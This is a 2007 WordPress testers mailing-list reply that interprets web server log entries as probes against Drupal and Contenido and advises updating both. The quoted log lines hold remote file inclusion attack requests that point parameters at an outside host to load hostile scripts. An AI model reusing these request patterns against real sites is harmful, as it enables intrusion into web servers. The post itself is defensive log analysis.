[wp-testers] More on hack...
Ryan Boren
ryan at boren.nu
Fri Dec 28 23:30:08 GMT 2007
On Dec 28, 2007 3:07 PM, cpa31335 <tpblogeditor at gmail.com> wrote:
> here's a snippet of my Hosts log file:
>
> 4.66.112.173 <http://64.66.112.173/> - - [17/Dec/2007:04:00:44 -0800] "GET
> /?q=node/2//?q=nodehttp://gw-gold.net/xpl/id.txt
That looks a lot like a drupal query to me. Looks like they're
probing. You'll probably see things like this in your logs too:
"GET /contenido/classes/class.inuse.php?cfg[path][contenido]=http://gw-gold.net/dragoc/id.txt?
HTTP/1.1" 403 1138 "-" "libwww-perl/5.805" - "-"
That one is trying to exploit a bug in Contendio.
If you have Drupal or Contendio installed, make sure they are at the
latest versions.
More information about the wp-testers
mailing list